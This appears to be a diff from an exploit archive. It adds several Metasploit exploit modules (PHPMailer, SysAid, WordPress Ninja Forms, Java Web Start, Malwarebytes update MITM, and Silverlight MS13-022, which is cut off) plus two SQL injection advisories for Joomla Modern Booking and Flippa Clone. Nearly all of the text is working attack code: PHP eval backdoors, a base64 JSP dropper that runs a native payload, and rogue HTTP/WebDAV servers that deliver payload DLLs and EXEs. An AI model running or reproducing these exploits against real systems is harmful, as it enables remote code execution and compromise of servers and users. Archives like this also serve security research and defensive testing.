email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
elsif target.name == 'PHPMailer 5.2.18 - 5.2.19'
email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
else
fail_with(Failure::NoTarget, 'The specified version is not supported')
end
data = Rex::MIME::Message.new
data.add_part('submit', nil, nil, 'form-data; name="action"')
data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
data.add_part(email, nil, nil, 'form-data; name="email"')
data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
print_status("Writing the backdoor to #{payload_file_path}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
register_files_for_cleanup(payload_file_path)
trigger(normalize_uri(datastore['TRIGGERURI'].blank? ? target_uri : datastore['TRIGGERURI'], payload_file_name))
end
end

268
platforms/multiple/webapps/41691.rb Executable file
View file

@ -0,0 +1,268 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'SysAid Help Desk Administrator Portal Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in SysAid Help Desk.
The vulnerability exists in the ChangePhoto.jsp in the administrator portal,
which does not correctly handle directory traversal sequences and does not
enforce file extension restrictions. While an attacker needs an administrator
account in order to leverage this vulnerability, there is a related Metasploit
auxiliary module which can create this account under some circumstances.
This module has been tested in SysAid v14.4 in both Linux and Windows.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-2994'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Privileged' => false,
'Platform' => %w{ linux win },
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Automatic', { } ],
[ 'SysAid Help Desk v14.4 / Linux',
{
'Platform' => 'linux'
}
],
[ 'SysAid Help Desk v14.4 / Windows',
{
'Platform' => 'win'
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 3 2015'))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 8080]),
OptString.new('TARGETURI', [ true, "SysAid path", '/sysaid']),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'Password for the specified username']),
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'errorInSignUp.htm'),
'method' => 'GET'
})
if res && res.code == 200 && res.body.to_s =~ /css\/master\.css\?v([0-9]{1,2})\.([0-9]{1,2})/
major = $1.to_i
minor = $2.to_i
if major == 14 && minor == 4
return Exploit::CheckCode::Appears
elsif major > 14
return Exploit::CheckCode::Safe
end
end
# Haven't tested in versions < 14.4, so we don't know if they are vulnerable or not
return Exploit::CheckCode::Unknown
end
def authenticate
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'Login.jsp'),
'method' => 'POST',
'vars_post' => {
'userName' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
})
if res && res.code == 302 && res.get_cookies
return res.get_cookies
else
return nil
end
end
def upload_payload(payload, is_exploit)
post_data = Rex::MIME::Message.new
post_data.add_part(payload,
'application/octet-stream', 'binary',
"form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(8))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(10))}.jsp\"")
data = post_data.to_s
if is_exploit
print_status("Uploading payload...")
end
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], 'ChangePhoto.jsp'),
'method' => 'POST',
'cookie' => @cookie,
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'vars_get' => { 'isUpload' => 'true' }
})
if res && res.code == 200 && res.body.to_s =~ /parent.glSelectedImageUrl = \"(.*)\"/
if is_exploit
print_status("Payload uploaded successfully")
end
return $1
else
return nil
end
end
def pick_target
unless target.name == 'Automatic'
return target
end
print_status("Determining target")
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
url = upload_payload(os_finder_payload, false)
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], url),
'method' => 'GET',
'cookie' => @cookie,
'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
})
if res && res.code == 200
if res.body.to_s =~ /Linux/
register_files_for_cleanup('webapps/' + url)
return targets[1]
elsif res.body.to_s =~ /Windows/
register_files_for_cleanup('root/' + url)
return targets[2]
end
end
nil
end
def generate_jsp_payload
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
var_raw = rand_text_alpha(rand(8) + 3)
var_ostream = rand_text_alpha(rand(8) + 3)
var_buf = rand_text_alpha(rand(8) + 3)
var_decoder = rand_text_alpha(rand(8) + 3)
var_tmp = rand_text_alpha(rand(8) + 3)
var_path = rand_text_alpha(rand(8) + 3)
var_proc2 = rand_text_alpha(rand(8) + 3)
if @my_target['Platform'] == 'linux'
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
Thread.sleep(200);
|
var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
else
chmod = ''
cleanup = ''
end
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
#{cleanup}
} catch (Exception e) {
}
%>
|
jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, '')
jsp = jsp.gsub(/\x0a/, '')
return jsp
end
def exploit
@cookie = authenticate
unless @cookie
fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with the provided credentials.")
end
print_status("Authentication was successful with the provided credentials.")
@my_target = pick_target
if @my_target.nil?
fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.")
end
print_status("Selected target #{@my_target.name}")
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
end
jsp_payload = generate_jsp_payload
jsp_path = upload_payload(jsp_payload, true)
unless jsp_path
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
if @my_target == targets[1]
register_files_for_cleanup('webapps/' + jsp_path)
else
register_files_for_cleanup('root/' + jsp_path)
end
print_status("Executing payload...")
send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], jsp_path),
'method' => 'GET',
'cookie' => @cookie,
'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
})
end
end

176
platforms/multiple/webapps/41692.rb Executable file
View file

@ -0,0 +1,176 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HTTP::Wordpress
def initialize(info = {})
super(update_info(
info,
'Name' => 'WordPress Ninja Forms Unauthenticated File Upload',
'Description' => %(
Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain
an unauthenticated file upload vulnerability, allowing guests
to upload arbitrary PHP code that can be executed in the context
of the web server.
),
'License' => MSF_LICENSE,
'Author' =>
[
'James Golovich', # Discovery and disclosure
'Rob Carr <rob[at]rastating.com>' # Metasploit module
],
'References' =>
[
['CVE', '2016-1209'],
['WPVDB', '8485'],
['URL', 'http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities']
],
'DisclosureDate' => 'May 04 2016',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['ninja-forms', {}]],
'DefaultTarget' => 0
))
opts = [OptString.new('FORM_PATH', [true, 'The relative path of the page that hosts any form served by Ninja Forms'])]
register_options(opts, self.class)
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def check
check_plugin_version_from_readme('ninja-forms', '2.9.43', '2.9.36')
end
def enable_v3_functionality
print_status 'Enabling vulnerable V3 functionality...'
res = send_request_cgi(
'method' => 'GET',
'uri' => target_uri.path,
'vars_get' => { 'nf-switcher' => 'upgrade' }
)
unless res && res.code == 200
if res
fail_with(Failure::Unreachable, "Failed to enable the vulnerable V3 functionality. Server returned: #{res.code}, should be 200.")
else
fail_with(Failure::Unreachable, 'Connection timed out.')
end
end
vprint_good 'Enabled V3 functionality'
end
def disable_v3_functionality
print_status 'Disabling vulnerable V3 functionality...'
res = send_request_cgi(
'method' => 'GET',
'uri' => target_uri.path,
'vars_get' => { 'nf-switcher' => 'rollback' }
)
if res && res.code == 200
vprint_good 'Disabled V3 functionality'
elsif !res
print_error('Connection timed out while disabling V3 functionality')
else
print_error 'Failed to disable the vulnerable V3 functionality'
end
end
def generate_mime_message(payload_name, nonce)
data = Rex::MIME::Message.new
data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
data.add_part(nonce, nil, nil, 'form-data; name="security"')
data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
data
end
def fetch_ninja_form_nonce
uri = normalize_uri(target_uri.path, datastore['FORM_PATH'])
res = send_request_cgi(
'method' => 'GET',
'uri' => uri
)
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, "Unable to access FORM_PATH: #{datastore['FORM_PATH']}")
end
form_wpnonce = res.get_hidden_inputs.first
form_wpnonce = form_wpnonce['_wpnonce'] if form_wpnonce
nonce = res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1] || form_wpnonce
unless nonce
fail_with(Failure::Unknown, 'Cannot find wpnonce or ajaxNonce from FORM_PATH')
end
nonce
end
def upload_payload(data)
res = send_request_cgi(
'method' => 'POST',
'uri' => wordpress_url_admin_ajax,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)
fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
vprint_error("Server responded with status code #{res.code}") if res.code != 200
end
def execute_payload(payload_name, payload_url)
register_files_for_cleanup("nftmp-#{payload_name.downcase}")
res = send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5)
if !res.nil? && res.code == 404
print_error("Failed to upload the payload")
else
print_good("Executed payload")
end
end
def exploit
# Vulnerable code is only available in the version 3 preview mode, which can be
# enabled by unauthenticated users due to lack of user level validation.
enable_v3_functionality
# Once the V3 preview mode is enabled, we can acquire a nonce by requesting any
# page that contains a form generated by Ninja Forms.
nonce = fetch_ninja_form_nonce
print_status("Preparing payload...")
payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
payload_url = normalize_uri(wordpress_url_wp_content, 'uploads', "nftmp-#{payload_name.downcase}")
data = generate_mime_message(payload_name, nonce)
print_status("Uploading payload to #{payload_url}")
upload_payload(data)
print_status("Executing the payload...")
execute_payload(payload_name, payload_url)
# Once the payload has been executed, we can disable the preview functionality again.
disable_v3_functionality
end
end

25
platforms/php/webapps/41673.txt Executable file
View file

@ -0,0 +1,25 @@
###############################################################################################
# Exploit Title: Joomla Modern Booking - SQL Injection
# Author: [ Hamed Izadi ]
#IRAN
# Vendor Homepage :
https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/modern-booking/
# Vendor Homepage : https://www.unikalus.com/
# Category: [ Webapps ]
# Tested on: [ Ubuntu ]
# Versions: 1.0
# Date: March 22, 2017
# PoC:
# coupon Parameter Vulnerable To SQLi
# Demo:
# https://server/modern-booking-slots?task=saveorder&coupon=test"&start=&option=com_modern_booking
# L u Arg
###############################################################################################

21
platforms/php/webapps/41674.txt Executable file
View file

@ -0,0 +1,21 @@
# # # # #
# Exploit Title: Flippa Clone - SQL Injection
# Google Dork: N/A
# Date: 23.03.2017
# Vendor Homepage: http://www.snobscript.com/
# Software: http://www.snobscript.com/downloads/flippa-clone/
# Demo: http://flippaportal.scriptfirm.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/domain-details/[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/site-details/[SQL]/Ihsan_Sencan
# http://localhost/[PATH]/ask-a-question/[SQL]
# Etc...
# # # # #

376
platforms/windows/local/41700.rb Executable file
View file

@ -0,0 +1,376 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection',
'Description' => %q{
This module exploits a flaw in the Web Start plugin component of Sun Java
Web Start. The arguments passed to Java Web Start are not properly validated.
By passing the lesser known -J option, an attacker can pass arbitrary options
directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed
by Ruben Santamarta, an attacker can execute arbitrary code in the context of
an unsuspecting browser user.
This vulnerability was originally discovered independently by both Ruben
Santamarta and Tavis Ormandy. Tavis reported that all versions since version
6 Update 10 "are believed to be affected by this vulnerability."
In order for this module to work, it must be ran as root on a server that
does not serve SMB. Additionally, the target host must have the WebClient
service (WebDAV Mini-Redirector) enabled.
},
'License' => MSF_LICENSE,
'Author' => 'jduck',
'References' =>
[
[ 'CVE', '2010-0886' ],
[ 'CVE', '2010-1423' ],
[ 'OSVDB', '63648' ],
[ 'BID', '39346' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html' ],
[ 'URL', 'http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1' ]
],
'Platform' => 'win',
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
},
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Java Runtime on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 09 2010'
))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ])
], self.class)
end
def auto_target(cli, request)
agent = request.headers['User-Agent']
ret = nil
#print_status("Agent: #{agent}")
# Check for MSIE and/or WebDAV redirector requests
if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
ret = targets[1]
elsif agent =~ /MSIE (6|7|8)\.0/
ret = targets[1]
else
print_status("Unknown User-Agent #{agent}")
end
ret
end
def on_request_uri(cli, request)
# For this exploit, this does little besides ensures the user agent is a recognized one..
mytarget = target
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if (not mytarget)
send_not_found(cli)
return
end
end
# Special case to process OPTIONS for /
if (request.method == 'OPTIONS' and request.uri == '/')
process_options(cli, request, mytarget)
return
end
# Discard requests for ico files
if (request.uri =~ /\.ico$/i)
send_not_found(cli)
return
end
# If there is no subdirectory in the request, we need to redirect.
if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
if (request.uri == '/')
subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
else
subdir = request.uri + '/'
end
print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
send_redirect(cli, subdir)
return
else
share_name = $1
end
# dispatch WebDAV requests based on method first
case request.method
when 'OPTIONS'
process_options(cli, request, mytarget)
when 'PROPFIND'
process_propfind(cli, request, mytarget)
when 'GET'
process_get(cli, request, mytarget, share_name)
when 'PUT'
print_status("Sending 404 for PUT #{request.uri} ...")
send_not_found(cli)
else
print_error("Unexpected request method encountered: #{request.method}")
end
end
#
# GET requests
#
def process_get(cli, request, target, share_name)
print_status("Responding to \"GET #{request.uri}\" request")
# dispatch based on extension
if (request.uri =~ /\.dll$/i)
#
# DLL requests sent by IE and the WebDav Mini-Redirector
#
print_status("Sending DLL")
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Generate a DLL based on the payload
dll_data = generate_payload_dll({ :code => p.encoded })
# Send it :)
send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })
else
#
# HTML requests sent by IE and Firefox
#
# This could probably use the Host header from the request
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
# Always prepare the UNC path, even if we dont use it for this request...
if (datastore['UNCPATH'])
unc = datastore['UNCPATH'].dup
else
unc = "\\\\" + my_host + "\\" + share_name
end
jnlp = "-J-XXaltjvm=" + unc + " -Xnosplash " + rand_text_alphanumeric(8+rand(8)) + ".jnlp"
docbase = rand_text_alphanumeric(8+rand(8))
# Provide the corresponding HTML page...
if (request.uri =~ /\.shtml/i)
print_status("Sending JS version HTML")
# Javascript version...
var_str = rand_text_alpha(8+rand(8))
var_obj = rand_text_alpha(8+rand(8))
var_obj2 = rand_text_alpha(8+rand(8))
var_obj3 = rand_text_alpha(8+rand(8))
js_jnlp = "http: "
js_jnlp << jnlp.dup.gsub("\\", "\\\\\\\\") # jeez
# The 8ad.. CLSID doesn't support the launch method ...
#clsid = '8AD9C840-044E-11D1-B3E9-00805F499D93'
clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA'
html = %Q|<html>
<body>Please wait...
<script language="javascript">
var #{var_str} = "#{js_jnlp}";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var #{var_obj} = document.createElement("OBJECT");
#{var_obj}.classid = "clsid:#{clsid}";
#{var_obj}.launch(#{var_str});
} else {
try {
var #{var_obj2} = document.createElement("OBJECT");
#{var_obj2}.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
document.body.appendChild(#{var_obj2});
#{var_obj2}.launch(#{var_str});
} catch (e) {
var #{var_obj3} = document.createElement("OBJECT");
#{var_obj3}.type = "application/java-deployment-toolkit";
document.body.appendChild(#{var_obj3});
#{var_obj3}.launch(#{var_str});
}
}
</script>
</body>
</html>
|
elsif (request.uri =~ /\.htm/i)
print_status("Sending non-JS version HTML")
clsids = [ '8AD9C840-044E-11D1-B3E9-00805F499D93', 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' ]
clsid = clsids[rand(clsids.length)]
html = %Q|<html>
<body>Please wait...
<object id="#{var_obj}" classid="clsid:#{clsid}"
width="0" height="0">
<PARAM name="launchjnlp" value="#{jnlp}">
<PARAM name="docbase" value="#{docbase}">
</object>
<embed type="application/x-java-applet"
width="0" height="0"
launchjnlp="#{jnlp}"
docbase="#{docbase}"
/>
</body>
</html>
|
else
print_status("Sending js detection HTML")
# NOTE: The JS version is preferred to the HTML version since it works on more JRE versions
js_uri = rand_text_alphanumeric(8+rand(8)) + ".shtml"
no_js_uri = rand_text_alphanumeric(8+rand(8)) + ".htm"
html = %Q|<html>
<head>
<meta http-equiv="refresh" content="2;#{no_js_uri}" />
</head>
<body>
Please wait...
<script language="javascript">
document.location = "#{js_uri}";
</script>
</body>
</html>
|
# end of detection html
end
send_response_html(cli, html,
{
'Content-Type' => 'text/html',
'Pragma' => 'no-cache'
})
end
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request, target)
print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request")
headers = {
#'DASL' => '<DAV:sql>',
#'DAV' => '1, 2',
'Allow' => 'OPTIONS, GET, PROPFIND',
'Public' => 'OPTIONS, GET, PROPFIND'
}
send_response(cli, '', headers)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request, target)
path = request.uri
print_status("Received WebDAV \"PROPFIND #{request.uri}\" request")
body = ''
if (path =~ /\.dll$/i)
# Response for the DLL
print_status("Sending DLL multistatus for #{path} ...")
#<lp1:getcontentlength>45056</lp1:getcontentlength>
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
# Response for anything else (generally just /)
print_status("Sending directory multistatus for #{path} ...")
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
else
print_status("Sending 404 for #{path} ...")
send_not_found(cli)
return
end
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# Make sure we're on the right port/path to support WebDAV
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
end
super
end
end

126
platforms/windows/local/41701.rb Executable file
View file

@ -0,0 +1,126 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking # Would be Great except MBAE doesn't version check
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpServer
VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/
EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/
NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' }
def initialize(info = {})
super(update_info(info,
'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution',
'Description' => %q{
This module exploits a vulnerability in the update functionality of
Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes
Anti-Exploit consumer 1.03.1.1220.
Due to the lack of proper update package validation, a man-in-the-middle
(MITM) attacker could execute arbitrary code by spoofing the update server
data-cdn.mbamupdates.com and uploading an executable. This module has
been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yonathan Klijnsma', # Vulnerability discovery and PoC
'Gabor Seljan', # Metasploit module
'todb' # Module refactoring
],
'References' =>
[
[ 'CVE', '2014-4936' ],
[' OSVDB', '116050'],
[ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', {} ]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 16 2014',
'DefaultTarget' => 0
))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ])
], self.class)
# Vulnerable Malwarebytes clients do not allow altering these.
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end
def on_request_uri(cli, request)
case request.uri
when VERSION_REGEX
serve_update_notice(cli) if set_exploit_target($1, request)
when EXE_REGEX
serve_exploit(cli)
else
vprint_status "Sending empty page for #{request.uri}"
serve_default_response(cli)
end
end
def serve_default_response(cli)
send_response(cli, '')
end
def check_client_version(request)
return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/
this_version = $1
next_version = NEXT_VERSION[:mbam]
if
Gem::Version.new(next_version) >= Gem::Version.new(this_version)
return true
else
print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update."
return false
end
end
def set_exploit_target(package, request)
case package
when /mbam/i
if check_client_version(request)
@client_software = ['Anti-Malware', NEXT_VERSION[:mbam]]
else
serve_default_response(cli)
return false
end
when /mbae/i
# We don't get identifying info from MBAE
@client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]]
end
end
def serve_update_notice(cli)
software,next_version = @client_software
print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'."
send_response(cli, next_version,
'Content-Type' => 'application/octet-stream'
)
end
def serve_exploit(cli)
print_status "Sending payload EXE..."
send_response(cli, generate_payload_exe,
'Content-Type' => 'application/x-msdos-program'
)
end
end

142
platforms/windows/local/41702.rb Executable file
View file

@ -0,0 +1,142 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
MANIFEST = <<-EOS
<Deployment xmlns="http://schemas.microsoft.com/client/2007/deployment" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" EntryPointAssembly="SilverApp1" EntryPointType="SilverApp1.App" RuntimeVersion="4.0.50826.0">
<Deployment.Parts>
<AssemblyPart x:Name="SilverApp1" Source="SilverApp1.dll" />
</Deployment.Parts>
</Deployment>
EOS
def initialize(info={})
super(update_info(info,
'Name' => "MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access",
'Description' => %q{
This module exploits a vulnerability in Microsoft Silverlight. The vulnerability exists on
the Initialize() method from System.Windows.Browser.ScriptObject, which access memory in an
unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class
from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP
SP3 / Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # RCE Vulnerability discovery
'Vitaliy Toropov', # Info Leak discovery, original exploit, all the hard work
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-0074' ],
[ 'CVE', '2013-3896' ],
[ 'OSVDB', '91147' ],
[ 'OSVDB', '98223' ],
[ 'BID', '58327' ],
[ 'BID', '62793' ],
[ 'MSB', 'MS13-022' ],
[ 'MSB', 'MS13-087' ],
[ 'PACKETSTORM', '123731' ]
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Arch' => ARCH_X86,
'BrowserRequirements' =>
{
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS,
:ua_name => Msf::HttpClients::IE,
:silverlight => "true"
},
'Targets' =>
[
[ 'Windows x86/x64', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Mar 12 2013",
'DefaultTarget' => 0))
end
def setup
@xap_name = "#{rand_text_alpha(5 + rand(5))}.xap"
@dll_name = "#{rand_text_alpha(5 + rand(5))}.dll"
File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.xap" ), "rb") { |f| @xap = f.read }
File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0074", "SilverApp1.dll" ), "rb") { |f| @dll = f.read }
